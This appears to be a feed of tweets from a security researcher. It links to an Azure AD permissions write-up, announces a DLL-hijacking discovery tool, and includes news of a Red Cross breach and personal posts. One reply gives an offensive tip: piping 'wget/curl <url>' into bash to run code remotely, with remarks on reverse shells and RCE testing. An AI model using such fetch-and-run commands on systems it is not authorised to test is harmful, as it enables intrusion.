@vxunderground Did you have a look at this? https://t.co/5a0FXKevmY CS uses the same approach for their powerpick command, works pretty good (https://t.co/3IE1JYCJcm)
Just uploaded part II of my Azure AD trip
Untangling Azure Active Directory Permissions II: Who is high privileged?
https://t.co/Eggz0MAVSE
#Azure#AzureAD
Fresh out the oven, Spartacus DLL Hijacking Discovery all-in-one!
👉Utilises SysInternals ProcMon
👉Built-in ProcMon raw config/log parser/generator
👉Auto-generate DLL proxies including their Exports
👉Ability to process huge ProcMon outputs
https://t.co/GfVRULiE0R
@TinkerSec A stunning visualization of structure and chaos in one image! The blue cables provide a calming antithesis to the dominating chaos that might otherwise overwhelm, or even distress, the viewer. Well done @TinkerSec, what an inspiration for all of us!
Cyberattack targeting Red Cross movements. Extremely sensitive data of over 500k of vulnerable ("due to conflict, migration and disaster, missing persons and their families, and people in detention") people affected. Terribly bad news... https://t.co/LqaSxUez1h
@da_667 Nice list :) wget/curl <url> | bash/sh should do the trick when missing exec perms. Also useful: Have tcpdump running on attacker when using rev shells (debugging) and testing for RCE (bash/nc are more likely to be absent than e.g. ping).
Had some duck today, walnut parfait as dessert. I don't usually tweet about this kind of stuff, but it was absolutely awesome. Receipts (German):
https://t.co/YTc5Z8yASy
https://t.co/oaDFArvXU8